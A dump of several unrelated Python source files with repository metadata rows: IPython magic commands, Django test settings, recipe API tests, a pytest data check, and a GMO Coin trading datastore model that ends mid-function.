(_format_time(cpu_user),_format_time(cpu_sys),_format_time(cpu_tot))
print "Wall time: %s" % _format_time(wall_time)
if tc > tc_min:
print "Compiler : %s" % _format_time(tc)
if tp > tp_min:
print "Parser : %s" % _format_time(tp)
return out
@skip_doctest
@line_magic
def macro(self, parameter_s=''):
"""Define a macro for future re-execution. It accepts ranges of history,
filenames or string objects.
Usage:\\
%macro [options] name n1-n2 n3-n4 ... n5 .. n6 ...
Options:
-r: use 'raw' input. By default, the 'processed' history is used,
so that magics are loaded in their transformed version to valid
Python. If this option is given, the raw input as typed at the
command line is used instead.
-q: quiet macro definition. By default, a tag line is printed
to indicate the macro has been created, and then the contents of
the macro are printed. If this option is given, then no printout
is produced once the macro is created.
This will define a global variable called `name` which is a string
made of joining the slices and lines you specify (n1,n2,... numbers
above) from your input history into a single string. This variable
acts like an automatic function which re-executes those lines as if
you had typed them. You just type 'name' at the prompt and the code
executes.
The syntax for indicating input ranges is described in %history.
Note: as a 'hidden' feature, you can also use traditional python slice
notation, where N:M means numbers N through M-1.
For example, if your history contains (print using %hist -n )::
44: x=1
45: y=3
46: z=x+y
47: print x
48: a=5
49: print 'x',x,'y',y
you can create a macro with lines 44 through 47 (included) and line 49
called my_macro with::
In [55]: %macro my_macro 44-47 49
Now, typing `my_macro` (without quotes) will re-execute all this code
in one pass.
You don't need to give the line-numbers in order, and any given line
number can appear multiple times. You can assemble macros with any
lines from your input history in any order.
The macro is a simple object which holds its value in an attribute,
but IPython's display system checks for macros and executes them as
code instead of printing them when you type their name.
You can view a macro's contents by explicitly printing it with::
print macro_name
"""
opts,args = self.parse_options(parameter_s,'rq',mode='list')
if not args: # List existing macros
return sorted(k for k,v in self.shell.user_ns.iteritems() if\
isinstance(v, Macro))
if len(args) == 1:
raise UsageError(
"%macro insufficient args; usage '%macro name n1-n2 n3-4...")
name, codefrom = args[0], " ".join(args[1:])
#print 'rng',ranges # dbg
try:
lines = self.shell.find_user_code(codefrom, 'r' in opts)
except (ValueError, TypeError) as e:
print e.args[0]
return
macro = Macro(lines)
self.shell.define_macro(name, macro)
if not ( 'q' in opts) :
print 'Macro `%s` created. To execute, type its name (without quotes).' % name
print '=== Macro contents: ==='
print macro,
@magic_arguments.magic_arguments()
@magic_arguments.argument('output', type=str, default='', nargs='?',
help="""The name of the variable in which to store output.
This is a utils.io.CapturedIO object with stdout/err attributes
for the text of the captured output.
CapturedOutput also has a show() method for displaying the output,
and __call__ as well, so you can use that to quickly display the
output.
If unspecified, captured output is discarded.
"""
)
@magic_arguments.argument('--no-stderr', action="store_true",
help="""Don't capture stderr."""
)
@magic_arguments.argument('--no-stdout', action="store_true",
help="""Don't capture stdout."""
)
@magic_arguments.argument('--no-display', action="store_true",
help="""Don't capture IPython's rich display."""
)
@cell_magic
def capture(self, line, cell):
"""run the cell, capturing stdout, stderr, and IPython's rich display() calls."""
args = magic_arguments.parse_argstring(self.capture, line)
out = not args.no_stdout
err = not args.no_stderr
disp = not args.no_display
with capture_output(out, err, disp) as io:
self.shell.run_cell(cell)
if args.output:
self.shell.user_ns[args.output] = io
def parse_breakpoint(text, current_file):
'''Returns (file, line) for file:line and (current_file, line) for line'''
colon = text.find(':')
if colon == -1:
return current_file, int(text)
else:
return text[:colon], int(text[colon+1:])
def _format_time(timespan, precision=3):
"""Formats the timespan in a human readable form"""
import math
if timespan >= 60.0:
# we have more than a minute, format that in a human readable form
# Idea from http://snipplr.com/view/5713/
parts = [("d", 60*60*24),("h", 60*60),("min", 60), ("s", 1)]
time = []
leftover = timespan
for suffix, length in parts:
value = int(leftover / length)
if value > 0:
leftover = leftover % length
time.append(u'%s%s' % (str(value), suffix))
if leftover < 1:
break
return " ".join(time)
# Unfortunately the unicode 'micro' symbol can cause problems in
# certain terminals.
# See bug: https://bugs.launchpad.net/ipython/+bug/348466
# Try to prevent crashes by being more secure than it needs to
# E.g. eclipse is able to print a µ, but has no sys.stdout.encoding set.
units = [u"s", u"ms",u'us',"ns"] # the save value
if hasattr(sys.stdout, 'encoding') and sys.stdout.encoding:
try:
u'\xb5'.encode(sys.stdout.encoding)
units = [u"s", u"ms",u'\xb5s',"ns"]
except:
pass
scaling = [1, 1e3, 1e6, 1e9]
if timespan > 0.0:
order = min(-int(math.floor(math.log10(timespan)) // 3), 3)
else:
order = 3
ret = u"%.*g %s" % (precision, timespan * scaling[order], units[order])
return ret
| 38.442203 | 92 | 0.567908 |
795bbd5d7f560cde381299806a3706c4dbb8b125 | 126 | py | Python | __init__.py | nchauhan890/tagger | 1b3769a6a8d540a58a608be276055282a697c00e | [
"MIT"
] | 2 | 2020-01-25T21:40:47.000Z | 2020-01-26T12:38:23.000Z | __init__.py | nchauhan890/tagger | 1b3769a6a8d540a58a608be276055282a697c00e | [
"MIT"
] | null | null | null | __init__.py | nchauhan890/tagger | 1b3769a6a8d540a58a608be276055282a697c00e | [
"MIT"
] | null | null | null | import tagger.api as api
import tagger.structure as structure
import tagger.lexers as lexers
import tagger.parsers as parsers
| 25.2 | 36 | 0.84127 |
795bbd6d3ea7917e85e2edd55a47bb85467ee617 | 2,933 | py | Python | test_settings.py | tony-joseph/crimson_antispam | 81c75f5ba80555f5d540133d0c10a9d8610321ee | [
"BSD-3-Clause"
] | 5 | 2018-02-13T13:17:24.000Z | 2020-05-06T16:59:37.000Z | test_settings.py | tony-joseph/crimson-antispam | 81c75f5ba80555f5d540133d0c10a9d8610321ee | [
"BSD-3-Clause"
] | 1 | 2016-04-25T09:20:16.000Z | 2016-04-26T15:25:30.000Z | test_settings.py | tony-joseph/crimson_antispam | 81c75f5ba80555f5d540133d0c10a9d8610321ee | [
"BSD-3-Clause"
] | 1 | 2018-04-13T09:03:41.000Z | 2018-04-13T09:03:41.000Z | import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c1!c3)sz$t$i=_a6z@eg#^zs*4v5z47s1^akw!*p!)jf8+exf%'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'antispam'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'test_urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
# crimson_antispam settings
ANTISPAM_SETTINGS = {
'REQUEST_INTERVAL': 1000,
}
| 24.855932 | 91 | 0.691101 |
795bbd93b7fd55c31805ab1067c3aefcd4971cbf | 10,129 | py | Python | app/recipe/tests/test_recipe_api.py | mathewajik/recipe-app-api | 2f7ba9ea7713f2420d9ffbe78bcaec090ac014d3 | [
"MIT"
] | null | null | null | app/recipe/tests/test_recipe_api.py | mathewajik/recipe-app-api | 2f7ba9ea7713f2420d9ffbe78bcaec090ac014d3 | [
"MIT"
] | null | null | null | app/recipe/tests/test_recipe_api.py | mathewajik/recipe-app-api | 2f7ba9ea7713f2420d9ffbe78bcaec090ac014d3 | [
"MIT"
] | null | null | null | import os
import tempfile
from PIL import Image
from core.models import Recipe, Tag, Ingredient
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from recipe.serializers import RecipeSerializer, RecipeDetailSerializer
from rest_framework import status
from rest_framework.test import APIClient
RECIPES_URL = reverse('recipe:recipe-list')
def image_upload_url(recipe_id):
"""Return URL for recipe image upload"""
return reverse('recipe:recipe-upload-image', args=[recipe_id])
def detail_url(recipe_id):
"""Return recipe detail URL"""
return reverse('recipe:recipe-detail', args=[recipe_id])
def sample_tag(user, name='Main course'):
"""Create and return a sample tag"""
return Tag.objects.create(user=user, name=name)
def sample_ingredient(user, name='Cinnamon'):
"""Create and return a sample ingredient"""
return Ingredient.objects.create(user=user, name=name)
def sample_recipe(user, **params):
"""Create and return a sample recipe"""
defaults = {
'title': 'Sample recipe',
'time_minutes': 10,
'price': 5.00,
}
defaults.update(params)
return Recipe.objects.create(user=user, **defaults)
class PublicRecipeApiTests(TestCase):
"""Test unauthenticated recipe API access"""
def setUp(self):
self.client = APIClient()
def test_required_auth(self):
"""Test the authenticaiton is required"""
res = self.client.get(RECIPES_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeApiTests(TestCase):
"""Test authenticated recipe API access"""
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'test@londonappdev.com',
'testpass'
)
self.client.force_authenticate(self.user)
def test_retrieve_recipes(self):
"""Test retrieving list of recipes"""
sample_recipe(user=self.user)
sample_recipe(user=self.user)
res = self.client.get(RECIPES_URL)
recipes = Recipe.objects.all().order_by('-id')
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_user(self):
"""Test retrieving recipes for user"""
user2 = get_user_model().objects.create_user(
'other@londonappdev.com',
'password123'
)
sample_recipe(user=user2)
sample_recipe(user=self.user)
res = self.client.get(RECIPES_URL)
recipes = Recipe.objects.filter(user=self.user)
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data, serializer.data)
def test_view_recipe_detail(self):
"""Test viewing a recipe detail"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
recipe.ingredients.add(sample_ingredient(user=self.user))
url = detail_url(recipe.id)
res = self.client.get(url)
serializer = RecipeDetailSerializer(recipe)
self.assertEqual(res.data, serializer.data)
def test_create_basic_recipe(self):
"""Test creating recipe"""
payload = {
'title': 'Chocolate cheesecake',
'time_minutes': 30,
'price': 5.00
}
res = self.client.post(RECIPES_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
for key in payload.keys():
self.assertEqual(payload[key], getattr(recipe, key))
def test_create_recipe_with_tags(self):
"""Test creating a recipe with tags"""
tag1 = sample_tag(user=self.user, name='Vegan')
tag2 = sample_tag(user=self.user, name='Dessert')
payload = {
'title': 'Avocado lime cheesecake',
'tags': [tag1.id, tag2.id],
'time_minutes': 60,
'price': 20.00
}
res = self.client.post(RECIPES_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
tags = recipe.tags.all()
self.assertEqual(tags.count(), 2)
self.assertIn(tag1, tags)
self.assertIn(tag2, tags)
def test_create_recipe_with_ingredients(self):
"""Test creating recipe with ingredients"""
ingredient1 = sample_ingredient(user=self.user, name='Prawns')
ingredient2 = sample_ingredient(user=self.user, name='Ginger')
payload = {
'title': 'Thai prawn red curry',
'ingredients': [ingredient1.id, ingredient2.id],
'time_minutes': 20,
'price': 7.00
}
res = self.client.post(RECIPES_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
ingredients = recipe.ingredients.all()
self.assertEqual(ingredients.count(), 2)
self.assertIn(ingredient1, ingredients)
self.assertIn(ingredient2, ingredients)
def test_partial_update_recipe(self):
"""Test updating a recipe with patch"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
new_tag = sample_tag(user=self.user, name='Curry')
payload = {'title': 'Chicken tikka', 'tags': [new_tag.id]}
url = detail_url(recipe.id)
self.client.patch(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 1)
self.assertIn(new_tag, tags)
def test_full_update_recipe(self):
"""Test updating a recipe with put"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
payload = {
'title': 'Spaghetti carbonara',
'time_minutes': 25,
'price': 5.00
}
url = detail_url(recipe.id)
self.client.put(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
self.assertEqual(recipe.time_minutes, payload['time_minutes'])
self.assertEqual(recipe.price, payload['price'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 0)
def test_filter_recipes_by_tags(self):
"""Test returning recipes with specific tags"""
recipe1 = sample_recipe(user=self.user, title='Thai vegetable curry')
recipe2 = sample_recipe(user=self.user, title='Aubergine with tahini')
tag1 = sample_tag(user=self.user, name='Vegan')
tag2 = sample_tag(user=self.user, name='Vegetarian')
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
recipe3 = sample_recipe(user=self.user, title='Fish and chips')
res = self.client.get(
RECIPES_URL,
{'tags': f'{tag1.id},{tag2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
def test_filter_recipes_by_ingredients(self):
"""Test returning recipes with specific ingredients"""
recipe1 = sample_recipe(user=self.user, title='Posh beans on toast')
recipe2 = sample_recipe(user=self.user, title='Chicken cacciatore')
ingredient1 = sample_ingredient(user=self.user, name='Feta cheese')
ingredient2 = sample_ingredient(user=self.user, name='Chicken')
recipe1.ingredients.add(ingredient1)
recipe2.ingredients.add(ingredient2)
recipe3 = sample_recipe(user=self.user, title='Steak and mushrooms')
res = self.client.get(
RECIPES_URL,
{'ingredients': f'{ingredient1.id},{ingredient2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
class RecipeImageUploadTests(TestCase):
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'user@londonappdev.com',
'testpass'
)
self.client.force_authenticate(self.user)
self.recipe = sample_recipe(user=self.user)
def tearDown(self):
self.recipe.image.delete()
def test_upload_image_to_recipe(self):
"""Test uploading an image to recipe"""
url = image_upload_url(self.recipe.id)
with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:
img = Image.new('RGB', (10, 10))
img.save(ntf, format='JPEG')
ntf.seek(0)
res = self.client.post(url, {'image': ntf}, format='multipart')
self.recipe.refresh_from_db()
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertIn('image', res.data)
self.assertTrue(os.path.exists(self.recipe.image.path))
def test_upload_image_bad_request(self):
"""Test uploading an invalid image"""
url = image_upload_url(self.recipe.id)
res = self.client.post(url, {'image': 'notimage'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
| 36.046263 | 79 | 0.628098 |
795bbe94f03fab5b38bfc6985757b3e0c5a4f5a7 | 1,713 | py | Python | src/data/sql_pipeline/0.8 prices_monthly_snapshot/test_prices_monthly_snapshot.py | parker84/north-dash | 2a726075df46c931715548fb203b3ac909199587 | [
"MIT"
] | null | null | null | src/data/sql_pipeline/0.8 prices_monthly_snapshot/test_prices_monthly_snapshot.py | parker84/north-dash | 2a726075df46c931715548fb203b3ac909199587 | [
"MIT"
] | 1 | 2022-02-26T18:10:05.000Z | 2022-02-26T18:10:05.000Z | src/data/sql_pipeline/0.8 prices_monthly_snapshot/test_prices_monthly_snapshot.py | parker84/northdash | 2a726075df46c931715548fb203b3ac909199587 | [
"MIT"
] | null | null | null | import pytest
from settings import ENGINE_PATH
from sqlalchemy import create_engine
from pandas_profiling import ProfileReport
import pandas as pd
import datetime
from src.utils.testing_suite import TestSuite
engine = create_engine(ENGINE_PATH)
conn = engine.connect()
prepped_test_suite = TestSuite(
unique_cols=['month_begin_date', 'geo', 'product_group']
)
@pytest.fixture
def prices_monthly_snapshot():
df = pd.read_sql("select * from stg.prices_monthly_snapshot", con=conn)
profile = ProfileReport(df, title="Raw Pandas Profiling Report", minimal=True)
profile.to_file("./reports/eda_reports/processed/prices_monthly_snapshot.html")
return df
@pytest.fixture
def prices_monthly_snapshot_filtered(prices_monthly_snapshot):
out_df = prices_monthly_snapshot.query(
"product_group == 'All-items'"
)
out_df = out_df[out_df.month_begin_date >= datetime.date(2005, 1, 1)]
return out_df
def test_processed_unique_column_set(prices_monthly_snapshot, prices_monthly_snapshot_filtered):
prepped_test_suite.test_for_unique_column_set(prices_monthly_snapshot)
prepped_test_suite.test_for_unique_column_set(prices_monthly_snapshot_filtered)
def test_processed_non_null_cols(prices_monthly_snapshot):
prepped_test_suite.test_for_nulls(
prices_monthly_snapshot,
non_null_cols=['month_begin_date', 'geo', 'product_group', 'consumer_price_index']
)
def test_processed_for_holes(prices_monthly_snapshot_filtered):
# prepped_test_suite.test_for_holes(prices_monthly_snapshot) # these do have holes, in part bc nunavut didn't become an official territory until 1999
prepped_test_suite.test_for_holes(prices_monthly_snapshot_filtered) | 40.785714 | 154 | 0.803853 |
795bc01c7f46fe923148ec3a456ed494ffedaf49 | 20,193 | py | Python | pybotters/models/gmocoin.py | yoshiY-private/pybotters | 571fa207470d9aebed4b2966815489bd1e5c95b6 | [
"MIT"
] | 1 | 2022-03-24T13:27:33.000Z | 2022-03-24T13:27:33.000Z | pybotters/models/gmocoin.py | yoshiY-private/pybotters | 571fa207470d9aebed4b2966815489bd1e5c95b6 | [
"MIT"
] | null | null | null | pybotters/models/gmocoin.py | yoshiY-private/pybotters | 571fa207470d9aebed4b2966815489bd1e5c95b6 | [
"MIT"
] | null | null | null | from __future__ import annotations
import asyncio
import logging
from datetime import datetime, timezone
from dateutil import parser
from decimal import Decimal
from enum import Enum, auto
from typing import Any, Awaitable, Optional, cast
import aiohttp
from pybotters.store import DataStore, DataStoreManager
from pybotters.typedefs import Item
from ..auth import Auth
from ..ws import ClientWebSocketResponse
try:
from typing import TypedDict
except ImportError:
from typing_extensions import TypedDict
logger = logging.getLogger(__name__)
def parse_datetime(x: Any) -> datetime:
if isinstance(x, str):
try:
exec_date = x.replace('T', ' ')[:-1]
exec_date = exec_date + '00000000'
dt = datetime(
int(exec_date[0:4]),
int(exec_date[5:7]),
int(exec_date[8:10]),
int(exec_date[11:13]),
int(exec_date[14:16]),
int(exec_date[17:19]),
int(exec_date[20:26]),
)
except Exception:
dt = parser.parse(x)
return dt
else:
raise ValueError(f'x only support str, but {type(x)} passed.')
class ApiType(Enum):
"""
API 区分
"""
Public = auto()
Private = auto()
class Channel(Enum):
"""
WebSocket API チャンネル
"""
# Public
TICKER = auto()
ORDER_BOOKS = auto()
TRADES = auto()
# Private
EXECUTION_EVENTS = auto()
ORDER_EVENTS = auto()
POSITION_EVENTS = auto()
POSITION_SUMMARY_EVENTS = auto()
@staticmethod
def from_str(name: str) -> "Channel":
if not hasattr(Channel, "_table"):
Channel._table = {
"ticker": Channel.TICKER,
"orderbooks": Channel.ORDER_BOOKS,
"trades": Channel.TRADES,
"executionEvents": Channel.EXECUTION_EVENTS,
"orderEvents": Channel.ORDER_EVENTS,
"positionEvents": Channel.POSITION_EVENTS,
"positionSummaryEvents": Channel.POSITION_SUMMARY_EVENTS,
}
return Channel._table[name]
class MessageType(Enum):
"""
メッセージタイプ
"""
NONE = auto()
ER = auto()
NOR = auto()
ROR = auto()
COR = auto()
OPR = auto()
UPR = auto()
ULR = auto()
CPR = auto()
INIT = auto()
UPDATE = auto()
PERIODIC = auto()
class Symbol(Enum):
"""
取り扱い銘柄
"""
BTC = auto()
ETH = auto()
BCH = auto()
LTC = auto()
XRP = auto()
BTC_JPY = auto()
ETH_JPY = auto()
BCH_JPY = auto()
LTC_JPY = auto()
XRP_JPY = auto()
class OrderSide(Enum):
"""
売買区分
"""
BUY = auto()
SELL = auto()
class ExecutionType(Enum):
"""
注文タイプ
"""
MARKET = auto()
LIMIT = auto()
STOP = auto()
class TimeInForce(Enum):
"""
執行数量条件
"""
FAK = auto()
FAS = auto()
FOK = auto()
SOK = auto()
class SettleType(Enum):
"""
決済区分
"""
OPEN = auto()
CLOSE = auto()
LOSS_CUT = auto()
class OrderType(Enum):
"""
取引区分
"""
NORMAL = auto()
LOSSCUT = auto()
class OrderStatus(Enum):
"""
注文ステータス
"""
WAITING = auto()
ORDERED = auto()
MODIFYING = auto()
CANCELLING = auto()
CANCELED = auto()
EXECUTED = auto()
EXPIRED = auto()
class CancelType(Enum):
"""
取消区分
"""
NONE = auto()
USER = auto()
POSITION_LOSSCUT = auto()
INSUFFICIENT_BALANCE = auto()
INSUFFICIENT_MARGIN = auto()
ACCOUNT_LOSSCUT = auto()
MARGIN_CALL = auto()
MARGIN_CALL_LOSSCUT = auto()
EXPIRED_FAK = auto()
EXPIRED_FOK = auto()
EXPIRED_SOK = auto()
CLOSED_ORDER = auto()
SOK_TAKER = auto()
PRICE_LIMIT = auto()
class Ticker(TypedDict):
ask: Decimal
bid: Decimal
high: Decimal
last: Decimal
low: Decimal
symbol: Symbol
timestamp: datetime
volume: Decimal
class OrderLevel(TypedDict):
symbol: Symbol
side: OrderSide
price: Decimal
size: Decimal
class OrderBook(TypedDict):
asks: list[OrderLevel]
bids: list[OrderLevel]
symbol: Symbol
timestamp: datetime
class Trade(TypedDict):
price: Decimal
side: OrderSide
size: Decimal
timestamp: datetime
symbol: Symbol
class Execution(TypedDict):
execution_id: int
order_id: int
symbol: Symbol
side: OrderSide
settle_type: SettleType
size: Decimal
price: Decimal
timestamp: datetime
loss_gain: Decimal
fee: Decimal
# properties that only appears websocket message
position_id: Optional[int]
execution_type: Optional[ExecutionType]
order_price: Optional[Decimal]
order_size: Optional[Decimal]
order_executed_size: Optional[Decimal]
order_timestamp: Optional[datetime]
time_in_force: Optional[str]
class Order(TypedDict):
order_id: int
symbol: Symbol
settle_type: SettleType
execution_type: ExecutionType
side: OrderSide
order_status: OrderStatus
order_timestamp: datetime
price: Decimal
size: Decimal
executed_size: Decimal
losscut_price: Decimal
time_in_force: TimeInForce
# properties that only appears websocket message
cancel_type: Optional[CancelType]
class Position(TypedDict):
position_id: int
symbol: Symbol
side: OrderSide
size: Decimal
orderd_size: Decimal
price: Decimal
loss_gain: Decimal
leverage: Decimal
losscut_price: Decimal
timestamp: datetime
class PositionSummary(TypedDict):
symbol: Symbol
side: OrderSide
average_position_rate: Decimal
position_loss_gain: Decimal
sum_order_quantity: Decimal
sum_position_quantity: Decimal
timestamp: datetime
class TickerStore(DataStore):
_KEYS = ["symbol"]
def _onmessage(self, mes: Ticker) -> None:
self._update([cast(Item, mes)])
class OrderBookStore(DataStore):
_KEYS = ["symbol", "side", "price"]
def _init(self) -> None:
self.timestamp: Optional[datetime] = None
def sorted(self, query: Optional[Item] = None) -> dict[OrderSide, list[OrderLevel]]:
if query is None:
query = {}
result: dict[OrderSide, list[OrderLevel]] = {
OrderSide.BUY: [],
OrderSide.SELL: [],
}
for item in self:
if all(k in item and query[k] == item[k] for k in query):
result[item["side"]].append(cast(OrderLevel, item))
result[OrderSide.SELL].sort(key=lambda x: x["price"])
result[OrderSide.BUY].sort(key=lambda x: x["price"], reverse=True)
return result
def _onmessage(self, mes: OrderBook) -> None:
data = mes["asks"] + mes["bids"]
result = self.find({"symbol": mes["symbol"]})
self._delete(result)
self._insert(cast("list[Item]", data))
self.timestamp = mes["timestamp"]
class TradeStore(DataStore):
def _onmessage(self, mes: Trade) -> None:
self._insert([cast(Item, mes)])
class OrderStore(DataStore):
_KEYS = ["order_id"]
def _onresponse(self, data: list[Order]) -> None:
self._insert(cast("list[Item]", data))
def _onmessage(self, mes: Order) -> None:
if mes["order_status"] in (OrderStatus.WAITING, OrderStatus.ORDERED):
self._update([cast(Item, mes)])
else:
self._delete([cast(Item, mes)])
def _onexecution(self, mes: Execution) -> None:
current = cast(Order, self.get({"order_id": mes["order_id"]}))
if (
mes["order_executed_size"]
and current
and current["executed_size"] < mes["order_executed_size"]
):
current["executed_size"] = mes["order_executed_size"]
remain = current["size"] - current["executed_size"]
if remain == 0:
self._delete([cast(Item, current)])
else:
self._update([cast(Item, current)])
class ExecutionStore(DataStore):
_KEYS = ["execution_id"]
def sorted(self, query: Optional[Item] = None) -> list[Execution]:
if query is None:
query = {}
result = []
for item in self:
if all(k in item and query[k] == item[k] for k in query):
result.append(item)
result.sort(key=lambda x: x["execution_id"], reverse=True)
return result
def _onresponse(self, data: list[Execution]) -> None:
self._insert(cast("list[Item]", data))
def _onmessage(self, mes: Execution) -> None:
self._insert([cast(Item, mes)])
class PositionStore(DataStore):
_KEYS = ["position_id"]
def _onresponse(self, data: list[Position]) -> None:
self._update(cast("list[Item]", data))
def _onmessage(self, mes: Position, type: MessageType) -> None:
if type == MessageType.OPR:
self._insert([cast(Item, mes)])
elif type == MessageType.CPR:
self._delete([cast(Item, mes)])
else:
self._update([cast(Item, mes)])
class PositionSummaryStore(DataStore):
_KEYS = ["symbol", "side"]
def _onresponse(self, data: list[PositionSummary]) -> None:
self._update(cast("list[Item]", data))
def _onmessage(self, mes: PositionSummary) -> None:
self._update([cast(Item, mes)])
class MessageHelper:
@staticmethod
def to_tickers(data: list[Item]) -> list["Ticker"]:
return [MessageHelper.to_ticker(x) for x in data]
@staticmethod
def to_ticker(data: Item) -> "Ticker":
return Ticker(
ask=Decimal(data["ask"]),
bid=Decimal(data["bid"]),
high=Decimal(data["high"]),
last=Decimal(data["last"]),
low=Decimal(data["low"]),
symbol=Symbol[data["symbol"]],
timestamp=parse_datetime(data.get("timestamp")),
volume=Decimal(data["volume"]),
)
@staticmethod
def to_orderbook(data: Item) -> "OrderBook":
return OrderBook(
asks=[
OrderLevel(
symbol=Symbol[data["symbol"]],
side=OrderSide.SELL,
price=Decimal(ol["price"]),
size=Decimal(ol["size"]),
)
for ol in data["asks"]
],
bids=[
OrderLevel(
symbol=Symbol[data["symbol"]],
side=OrderSide.BUY,
price=Decimal(ol["price"]),
size=Decimal(ol["size"]),
)
for ol in data["bids"]
],
symbol=Symbol[data["symbol"]],
timestamp=parse_datetime(data.get("timestamp")),
)
@staticmethod
def to_trades(data: list[Item]) -> list["Trade"]:
return [MessageHelper.to_trade(x) for x in data]
@staticmethod
def to_trade(data: Item) -> "Trade":
return Trade(
price=Decimal(data["price"]),
side=OrderSide[data["side"]],
size=Decimal(data["size"]),
timestamp=parse_datetime(data.get("timestamp")),
symbol=Symbol[data["symbol"]],
)
@staticmethod
def to_executions(data: list[Item]) -> list["Execution"]:
return [MessageHelper.to_execution(x) for x in data]
@staticmethod
def to_execution(data: Item) -> "Execution":
return Execution(
order_id=data["orderId"],
execution_id=data["executionId"],
symbol=Symbol[data["symbol"]],
settle_type=SettleType[data["settleType"]],
side=OrderSide[data["side"]],
price=Decimal(data.get("executionPrice", data.get("price"))),
size=Decimal(data.get("executionSize", data.get("size"))),
timestamp=parse_datetime(
data.get("executionTimestamp", data.get("timestamp"))
),
loss_gain=Decimal(data["lossGain"]),
fee=Decimal(data["fee"]),
# properties that only appears websocket message
position_id=data["positionId"] if "positionId" in data else None,
execution_type=ExecutionType[data["executionType"]]
if "executionType" in data
else None,
order_price=Decimal(data["orderPrice"]) if "orderPrice" in data else None,
order_size=Decimal(data["orderSize"]) if ("orderSize" in data) else None,
order_executed_size=Decimal(data["orderExecutedSize"])
if "orderExecutedSize" in data
else None,
order_timestamp=parse_datetime(data["orderTimestamp"])
if "orderTimestamp" in data
else None,
time_in_force=data.get("timeInForce", None),
)
@staticmethod
def to_orders(data: list[Item]) -> list["Order"]:
return [MessageHelper.to_order(x) for x in data]
@staticmethod
def to_order(data: Item) -> "Order":
status = OrderStatus[data.get("status", data.get("orderStatus"))]
timestamp = parse_datetime(data.get("orderTimestamp", data.get("timestamp")))
return Order(
order_id=data["orderId"],
symbol=Symbol[data["symbol"]],
settle_type=SettleType[data["settleType"]],
execution_type=ExecutionType[data["executionType"]],
side=OrderSide[data["side"]],
order_status=status,
cancel_type=CancelType[data.get("cancelType", CancelType.NONE.name)],
order_timestamp=timestamp,
price=Decimal(data.get("price", data.get("orderPrice"))),
size=Decimal(data.get("size", data.get("orderSize"))),
executed_size=Decimal(
